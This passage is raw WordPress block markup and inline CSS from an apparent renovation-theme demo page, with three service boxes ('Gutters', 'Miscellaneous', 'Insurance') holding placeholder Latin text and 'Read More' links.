@media only screen and (max-width: 976px){\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a0a55c24-9609-4315-bdd8-be9cd6ecddbb\"} -->\n<style type=\"text/css\"> .block-a0a55c24-9609-4315-bdd8-be9cd6ecddbb .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a0a55c24-9609-4315-bdd8-be9cd6ecddbb .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a0a55c24-9609-4315-bdd8-be9cd6ecddbb .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a0a55c24-9609-4315-bdd8-be9cd6ecddbb .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a0a55c24-9609-4315-bdd8-be9cd6ecddbb .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a0a55c24-9609-4315-bdd8-be9cd6ecddbb .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a0a55c24-9609-4315-bdd8-be9cd6ecddbb .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a0a55c24-9609-4315-bdd8-be9cd6ecddbb skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"25bbc5d7-2a57-4bc8-a0d8-1ed38330e270\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-25bbc5d7-2a57-4bc8-a0d8-1ed38330e270 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-25bbc5d7-2a57-4bc8-a0d8-1ed38330e270 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-25bbc5d7-2a57-4bc8-a0d8-1ed38330e270 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-25bbc5d7-2a57-4bc8-a0d8-1ed38330e270 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-25bbc5d7-2a57-4bc8-a0d8-1ed38330e270 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-25bbc5d7-2a57-4bc8-a0d8-1ed38330e270\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"9244b598-8766-4656-8511-9d5c0ddfbd00\"} -->\n<style type=\"text/css\"> .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-9244b598-8766-4656-8511-9d5c0ddfbd00 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"62578abc-cb88-4780-b159-c138c0238580\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-62578abc-cb88-4780-b159-c138c0238580 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-62578abc-cb88-4780-b159-c138c0238580 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-62578abc-cb88-4780-b159-c138c0238580 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-62578abc-cb88-4780-b159-c138c0238580 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-62578abc-cb88-4780-b159-c138c0238580 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-62578abc-cb88-4780-b159-c138c0238580\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"15e20f8d-ee8a-4000-9529-0964645b834e\"} -->\n<style type=\"text/css\"> .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-15e20f8d-ee8a-4000-9529-0964645b834e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"1822a97f-3101-4017-95da-fd746d14f8d4\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-1822a97f-3101-4017-95da-fd746d14f8d4 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1822a97f-3101-4017-95da-fd746d14f8d4 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1822a97f-3101-4017-95da-fd746d14f8d4 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-1822a97f-3101-4017-95da-fd746d14f8d4 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1822a97f-3101-4017-95da-fd746d14f8d4 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1822a97f-3101-4017-95da-fd746d14f8d4\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"18e95af7-62ee-40ea-8ba8-965dcd144755\"} -->\n<style type=\"text/css\"> .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-18e95af7-62ee-40ea-8ba8-965dcd144755 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" 